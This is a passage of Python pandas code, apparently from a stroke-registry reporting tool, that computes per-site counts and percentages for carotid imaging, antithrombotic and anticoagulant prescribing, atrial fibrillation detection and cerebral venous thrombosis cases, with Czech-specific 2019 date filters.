self.statsDf = self._get_values_for_factors(column_name="AFIB_OTHER_RECS", value=2, new_column_name='# other afib detection method - Not detected or not known')
self.statsDf['% other afib detection method - Not detected or not known'] = self.statsDf.apply(lambda x: round(((x['# other afib detection method - Not detected or not known']/x['afib_not_detected_or_not_known_patients']) * 100), 2) if x['afib_not_detected_or_not_known_patients'] > 0 else 0, axis=1)
############################
# CAROTID ARTERIES IMAGING #
############################
if country_code == 'CZ':
print(period)
if (not comparison and self.period.startswith('Q1') and self.period.endswith('2019')):
self.statsDf.loc[:, '# carotid arteries imaging - Not known'] = 'N/A'
self.statsDf.loc[:, '% carotid arteries imaging - Not known'] = 'N/A'
self.statsDf.loc[:, '# carotid arteries imaging - Yes'] = 'N/A'
self.statsDf.loc[:, '% carotid arteries imaging - Yes'] = 'N/A'
self.statsDf.loc[:, '# carotid arteries imaging - No'] = 'N/A'
self.statsDf.loc[:, '% carotid arteries imaging - No'] = 'N/A'
elif (not comparison and (self.period.startswith('March_Oct') and self.period.endswith('2019'))):
date1 = date(2019, 10, 1)
date2 = date(2019, 10, 31)
obj = FilterDataset(df=self.raw_data, country='CZ', date1=date1, date2=date2)
cz_df = obj.fdf.copy()
site_ids = self.statsDf['Protocol ID'].tolist()
cz_df = cz_df.loc[cz_df['Protocol ID'].isin(site_ids)].copy()
if (country):
country_df = cz_df.copy()
#self.country_name = pytz.country_names[country_code]
# country['Protocol ID'] = self.country_name
#country['Site Name'] = self.country_name
country_df['Protocol ID'] = country_df['Country']
country_df['Site Name'] = country_df['Country']
cz_df = pd.concat([cz_df, country_df])
del country_df
cz_df_is_tia = cz_df.loc[cz_df['STROKE_TYPE'].isin([1,3])].copy()
self.statsDf['cz_df_is_tia_pts'] = self._count_patients(dataframe=cz_df_is_tia)
self.tmp = cz_df_is_tia.groupby(['Protocol ID', 'CAROTID_ARTERIES_IMAGING']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=3, new_column_name='# carotid arteries imaging - Not known')
self.statsDf['% carotid arteries imaging - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Not known']/x['cz_df_is_tia_pts']) * 100), 2) if x['cz_df_is_tia_pts'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=1, new_column_name='# carotid arteries imaging - Yes')
self.statsDf['% carotid arteries imaging - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Yes']/(x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=2, new_column_name='# carotid arteries imaging - No')
self.statsDf['% carotid arteries imaging - No'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - No']/(x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
del cz_df_is_tia, cz_df
elif (not comparison and (self.period.startswith('Q2') or self.period.startswith('H1')) and self.period.endswith('2019')):
date1 = date(2019, 7, 19)
date2 = date(2019, 8, 31)
obj = FilterDataset(df=self.raw_data, country='CZ', date1=date1, date2=date2)
cz_df = obj.fdf.copy()
site_ids = self.statsDf['Protocol ID'].tolist()
cz_df = cz_df.loc[cz_df['Protocol ID'].isin(site_ids)].copy()
if (country):
country_df = cz_df.copy()
#self.country_name = pytz.country_names[country_code]
# country['Protocol ID'] = self.country_name
#country['Site Name'] = self.country_name
country_df['Protocol ID'] = country_df['Country']
country_df['Site Name'] = country_df['Country']
cz_df = pd.concat([cz_df, country_df])
del country_df
cz_df_is_tia = cz_df.loc[cz_df['STROKE_TYPE'].isin([1,3])].copy()
self.statsDf['cz_df_is_tia_pts'] = self._count_patients(dataframe=cz_df_is_tia)
self.tmp = cz_df_is_tia.groupby(['Protocol ID', 'CAROTID_ARTERIES_IMAGING']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=3, new_column_name='# carotid arteries imaging - Not known')
self.statsDf['% carotid arteries imaging - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Not known']/x['cz_df_is_tia_pts']) * 100), 2) if x['cz_df_is_tia_pts'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=1, new_column_name='# carotid arteries imaging - Yes')
self.statsDf['% carotid arteries imaging - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Yes']/(x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=2, new_column_name='# carotid arteries imaging - No')
self.statsDf['% carotid arteries imaging - No'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - No']/(x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
del cz_df_is_tia, cz_df
elif (not comparison and self.period == '2019'):
date1 = date(2019, 7, 19)
date2 = date(2019, 12, 31)
obj = FilterDataset(df=self.raw_data, country='CZ', date1=date1, date2=date2)
cz_df = obj.fdf.copy()
site_ids = self.statsDf['Protocol ID'].tolist()
cz_df = cz_df.loc[cz_df['Protocol ID'].isin(site_ids)].copy()
if (country):
country_df = cz_df.copy()
#self.country_name = pytz.country_names[country_code]
# country['Protocol ID'] = self.country_name
#country['Site Name'] = self.country_name
country_df['Protocol ID'] = country_df['Country']
country_df['Site Name'] = country_df['Country']
cz_df = pd.concat([cz_df, country_df])
del country_df
cz_df_is_tia = cz_df.loc[cz_df['STROKE_TYPE'].isin([1,3])].copy()
self.statsDf['cz_df_is_tia_pts'] = self._count_patients(dataframe=cz_df_is_tia)
self.tmp = cz_df_is_tia.groupby(['Protocol ID', 'CAROTID_ARTERIES_IMAGING']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=3, new_column_name='# carotid arteries imaging - Not known')
self.statsDf['% carotid arteries imaging - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Not known']/x['cz_df_is_tia_pts']) * 100), 2) if x['cz_df_is_tia_pts'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=1, new_column_name='# carotid arteries imaging - Yes')
self.statsDf['% carotid arteries imaging - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Yes']/(x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=2, new_column_name='# carotid arteries imaging - No')
self.statsDf['% carotid arteries imaging - No'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - No']/(x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
del cz_df_is_tia, cz_df
else:
self.tmp = is_tia.groupby(['Protocol ID', 'CAROTID_ARTERIES_IMAGING']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=3, new_column_name='# carotid arteries imaging - Not known')
self.statsDf['% carotid arteries imaging - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Not known']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=1, new_column_name='# carotid arteries imaging - Yes')
self.statsDf['% carotid arteries imaging - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Yes']/(x['is_tia_patients'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['is_tia_patients'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=2, new_column_name='# carotid arteries imaging - No')
self.statsDf['% carotid arteries imaging - No'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - No']/(x['is_tia_patients'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['is_tia_patients'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
if 'cz_df_is_tia_pts' in self.statsDf.columns:
self.statsDf.drop(['cz_df_is_tia_pts'], inplace=True, axis=1)
else:
self.tmp = is_tia.groupby(['Protocol ID', 'CAROTID_ARTERIES_IMAGING']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=3, new_column_name='# carotid arteries imaging - Not known')
self.statsDf['% carotid arteries imaging - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Not known']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=1, new_column_name='# carotid arteries imaging - Yes')
self.statsDf['% carotid arteries imaging - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Yes']/(x['is_tia_patients'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['is_tia_patients'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=2, new_column_name='# carotid arteries imaging - No')
self.statsDf['% carotid arteries imaging - No'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - No']/(x['is_tia_patients'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['is_tia_patients'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
############################
# ANTITHROMBOTICS WITH CVT #
############################
# Create dataframe with dead patients excluded
antithrombotics_with_cvt = is_tia_cvt[~is_tia_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['antithrombotics_patients_with_cvt'] = self._count_patients(dataframe=antithrombotics_with_cvt)
ischemic_transient_cerebral_dead = is_tia_cvt[is_tia_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['ischemic_transient_cerebral_dead_patients'] = self._count_patients(dataframe=ischemic_transient_cerebral_dead)
self.tmp = antithrombotics_with_cvt.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
del antithrombotics_with_cvt, ischemic_transient_cerebral_dead
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# patients receiving antiplatelets with CVT')
self.statsDf['% patients receiving antiplatelets with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving antiplatelets with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=2, new_column_name='# patients receiving Vit. K antagonist with CVT')
self.statsDf['% patients receiving Vit. K antagonist with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving Vit. K antagonist with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=3, new_column_name='# patients receiving dabigatran with CVT')
self.statsDf['% patients receiving dabigatran with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving dabigatran with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=4, new_column_name='# patients receiving rivaroxaban with CVT')
self.statsDf['% patients receiving rivaroxaban with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving rivaroxaban with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=5, new_column_name='# patients receiving apixaban with CVT')
self.statsDf['% patients receiving apixaban with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving apixaban with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=6, new_column_name='# patients receiving edoxaban with CVT')
self.statsDf['% patients receiving edoxaban with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving edoxaban with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=7, new_column_name='# patients receiving LMWH or heparin in prophylactic dose with CVT')
self.statsDf['% patients receiving LMWH or heparin in prophylactic dose with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in prophylactic dose with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=8, new_column_name='# patients receiving LMWH or heparin in full anticoagulant dose with CVT')
self.statsDf['% patients receiving LMWH or heparin in full anticoagulant dose with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in full anticoagulant dose with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=9, new_column_name='# patients not prescribed antithrombotics, but recommended with CVT')
self.statsDf['% patients not prescribed antithrombotics, but recommended with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients not prescribed antithrombotics, but recommended with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=10, new_column_name='# patients neither receiving antithrombotics nor recommended with CVT')
self.statsDf['% patients neither receiving antithrombotics nor recommended with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients neither receiving antithrombotics nor recommended with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
## ANTITHROMBOTICS - PATIENTS PRESCRIBED + RECOMMENDED
self.statsDf.loc[:, '# patients prescribed antithrombotics with CVT'] = self.statsDf.apply(lambda x: x['# patients receiving antiplatelets with CVT'] + x['# patients receiving Vit. K antagonist with CVT'] + x['# patients receiving dabigatran with CVT'] + x['# patients receiving rivaroxaban with CVT'] + x['# patients receiving apixaban with CVT'] + x['# patients receiving edoxaban with CVT'] + x['# patients receiving LMWH or heparin in prophylactic dose with CVT'] + x['# patients receiving LMWH or heparin in full anticoagulant dose with CVT'], axis=1)
# self.statsDf['% patients prescribed antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended']) > 0 else 0, axis=1)
self.statsDf['% patients prescribed antithrombotics with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf.loc[:, '# patients prescribed or recommended antithrombotics with CVT'] = self.statsDf.apply(lambda x: x['# patients receiving antiplatelets with CVT'] + x['# patients receiving Vit. K antagonist with CVT'] + x['# patients receiving dabigatran with CVT'] + x['# patients receiving rivaroxaban with CVT'] + x['# patients receiving apixaban with CVT'] + x['# patients receiving edoxaban with CVT'] + x['# patients receiving LMWH or heparin in prophylactic dose with CVT'] + x['# patients receiving LMWH or heparin in full anticoagulant dose with CVT'] + x['# patients not prescribed antithrombotics, but recommended with CVT'], axis=1)
self.statsDf['% patients prescribed or recommended antithrombotics with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed or recommended antithrombotics with CVT'] - x['ischemic_transient_cerebral_dead_patients'])/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended with CVT'])) * 100, 2) if ((x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended with CVT']) > 0) else 0, axis=1)
self.statsDf.fillna(0, inplace=True)
###########################################
# ANTIPLATELETS - PRESCRIBED WITHOUT AFIB #
###########################################
afib_flutter_not_detected_or_not_known_with_cvt = is_tia_cvt[is_tia_cvt['AFIB_FLUTTER'].isin([4, 5])].copy()
self.statsDf['afib_flutter_not_detected_or_not_known_patients_with_cvt'] = self._count_patients(dataframe=afib_flutter_not_detected_or_not_known_with_cvt)
afib_flutter_not_detected_or_not_known_with_cvt_dead = afib_flutter_not_detected_or_not_known_with_cvt[afib_flutter_not_detected_or_not_known_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_not_detected_or_not_known_dead_patients_with_cvt'] = self._count_patients(dataframe=afib_flutter_not_detected_or_not_known_with_cvt_dead)
prescribed_antiplatelets_no_afib_with_cvt = afib_flutter_not_detected_or_not_known_with_cvt[afib_flutter_not_detected_or_not_known_with_cvt['ANTITHROMBOTICS'].isin([1])].copy()
self.statsDf['prescribed_antiplatelets_no_afib_patients_with_cvt'] = self._count_patients(dataframe=prescribed_antiplatelets_no_afib_with_cvt)
prescribed_antiplatelets_no_afib_dead_with_cvt = prescribed_antiplatelets_no_afib_with_cvt[prescribed_antiplatelets_no_afib_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['prescribed_antiplatelets_no_afib_dead_patients_with_cvt'] = self._count_patients(dataframe=prescribed_antiplatelets_no_afib_dead_with_cvt)
self.tmp = afib_flutter_not_detected_or_not_known_with_cvt.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# patients prescribed antiplatelets without aFib with CVT')
self.statsDf['% patients prescribed antiplatelets without aFib with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antiplatelets without aFib with CVT'] - x['prescribed_antiplatelets_no_afib_dead_patients_with_cvt'])/(x['afib_flutter_not_detected_or_not_known_patients_with_cvt'] - x['afib_flutter_not_detected_or_not_known_dead_patients_with_cvt'])) * 100, 2) if ((x['afib_flutter_not_detected_or_not_known_patients_with_cvt'] - x['afib_flutter_not_detected_or_not_known_dead_patients_with_cvt']) > 0) else 0, axis=1)
del afib_flutter_not_detected_or_not_known_with_cvt, afib_flutter_not_detected_or_not_known_with_cvt_dead, prescribed_antiplatelets_no_afib_with_cvt, prescribed_antiplatelets_no_afib_dead_with_cvt
#########################################
# ANTICOAGULANTS - PRESCRIBED WITH AFIB #
#########################################
afib_flutter_detected_with_cvt = is_tia_cvt[is_tia_cvt['AFIB_FLUTTER'].isin([1, 2, 3])].copy()
self.statsDf['afib_flutter_detected_patients_with_cvt'] = self._count_patients(dataframe=afib_flutter_detected_with_cvt)
anticoagulants_prescribed_with_cvt = afib_flutter_detected_with_cvt[~afib_flutter_detected_with_cvt['ANTITHROMBOTICS'].isin([1, 10, 9]) & ~afib_flutter_detected_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['# patients prescribed anticoagulants with aFib with CVT'] = self._count_patients(dataframe=anticoagulants_prescribed_with_cvt)
anticoagulants_recommended_with_cvt = afib_flutter_detected_with_cvt[afib_flutter_detected_with_cvt['ANTITHROMBOTICS'].isin([9])].copy()
self.statsDf['anticoagulants_recommended_patients_with_cvt'] = self._count_patients(dataframe=anticoagulants_recommended_with_cvt)
afib_flutter_detected_dead_with = afib_flutter_detected_with_cvt[afib_flutter_detected_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_detected_dead_patients_with_cvt'] = self._count_patients(dataframe=afib_flutter_detected_dead_with)
self.statsDf['% patients prescribed anticoagulants with aFib with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed anticoagulants with aFib with CVT']/(x['afib_flutter_detected_patients_with_cvt'] - x['afib_flutter_detected_dead_patients_with_cvt'])) * 100), 2) if (x['afib_flutter_detected_patients_with_cvt'] - x['afib_flutter_detected_dead_patients_with_cvt']) > 0 else 0, axis=1)
##########################################
# ANTITHROMBOTICS - PRESCRIBED WITH AFIB #
##########################################
antithrombotics_prescribed_with_cvt = afib_flutter_detected_with_cvt[~afib_flutter_detected_with_cvt['ANTITHROMBOTICS'].isin([9, 10]) & ~afib_flutter_detected_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['# patients prescribed antithrombotics with aFib with CVT'] = self._count_patients(dataframe=antithrombotics_prescribed_with_cvt)
recommended_antithrombotics_with_afib_alive_with_cvt = afib_flutter_detected_with_cvt[afib_flutter_detected_with_cvt['ANTITHROMBOTICS'].isin([9]) & ~afib_flutter_detected_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['recommended_antithrombotics_with_afib_alive_patients_with_cvt'] = self._count_patients(dataframe=recommended_antithrombotics_with_afib_alive_with_cvt)
self.statsDf['% patients prescribed antithrombotics with aFib with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics with aFib with CVT']/(x['afib_flutter_detected_patients_with_cvt'] - x['afib_flutter_detected_dead_patients_with_cvt'] - x['recommended_antithrombotics_with_afib_alive_patients_with_cvt'])) * 100), 2) if (x['afib_flutter_detected_dead_patients_with_cvt'] - x['afib_flutter_detected_dead_patients_with_cvt'] - x['recommended_antithrombotics_with_afib_alive_patients_with_cvt']) > 0 else 0, axis=1)
del afib_flutter_detected_with_cvt, anticoagulants_prescribed_with_cvt, anticoagulants_recommended_with_cvt, afib_flutter_detected_dead_with, antithrombotics_prescribed_with_cvt, recommended_antithrombotics_with_afib_alive_with_cvt
###############################
# ANTITHROMBOTICS WITHOUT CVT #
###############################
antithrombotics = is_tia[~is_tia['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['antithrombotics_patients'] = self._count_patients(dataframe=antithrombotics)
ischemic_transient_dead = is_tia[is_tia['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['ischemic_transient_dead_patients'] = self._count_patients(dataframe=ischemic_transient_dead)
del ischemic_transient_dead
ischemic_transient_dead_prescribed = is_tia[is_tia['DISCHARGE_DESTINATION'].isin([5]) & ~is_tia['ANTITHROMBOTICS'].isin([10])].copy()
self.statsDf['ischemic_transient_dead_patients_prescribed'] = self._count_patients(dataframe=ischemic_transient_dead_prescribed)
del ischemic_transient_dead_prescribed
self.tmp = antithrombotics.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# patients receiving antiplatelets')
self.statsDf['% patients receiving antiplatelets'] = self.statsDf.apply(lambda x: round(((x['# patients receiving antiplatelets']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=2, new_column_name='# patients receiving Vit. K antagonist')
# self.statsDf['% patients receiving Vit. K antagonist'] = self.statsDf.apply(lambda x: round(((x['# patients receiving Vit. K antagonist']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=3, new_column_name='# patients receiving dabigatran')
# self.statsDf['% patients receiving dabigatran'] = self.statsDf.apply(lambda x: round(((x['# patients receiving dabigatran']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=4, new_column_name='# patients receiving rivaroxaban')
# self.statsDf['% patients receiving rivaroxaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving rivaroxaban']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=5, new_column_name='# patients receiving apixaban')
# self.statsDf['% patients receiving apixaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving apixaban']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=6, new_column_name='# patients receiving edoxaban')
# self.statsDf['% patients receiving edoxaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving edoxaban']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=7, new_column_name='# patients receiving LMWH or heparin in prophylactic dose')
# self.statsDf['% patients receiving LMWH or heparin in prophylactic dose'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in prophylactic dose']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=8, new_column_name='# patients receiving LMWH or heparin in full anticoagulant dose')
# self.statsDf['% patients receiving LMWH or heparin in full anticoagulant dose'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in full anticoagulant dose']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=9, new_column_name='# patients not prescribed antithrombotics, but recommended')
self.statsDf['% patients not prescribed antithrombotics, but recommended'] = self.statsDf.apply(lambda x: round(((x['# patients not prescribed antithrombotics, but recommended']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=10, new_column_name='# patients neither receiving antithrombotics nor recommended')
self.statsDf['% patients neither receiving antithrombotics nor recommended'] = self.statsDf.apply(lambda x: round(((x['# patients neither receiving antithrombotics nor recommended']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
## ANTITHROMBOTICS - PATIENTS PRESCRIBED + RECOMMENDED
self.statsDf.loc[:, '# patients prescribed antithrombotics'] = self.statsDf.apply(lambda x: x['# patients receiving antiplatelets'] + x['# patients receiving Vit. K antagonist'] + x['# patients receiving dabigatran'] + x['# patients receiving rivaroxaban'] + x['# patients receiving apixaban'] + x['# patients receiving edoxaban'] + x['# patients receiving LMWH or heparin in prophylactic dose'] + x['# patients receiving LMWH or heparin in full anticoagulant dose'], axis=1)
# self.statsDf['% patients prescribed antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics']/(x['is_tia_cvt_patients'] - x['ischemic_transient_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended']) > 0 else 0, axis=1)
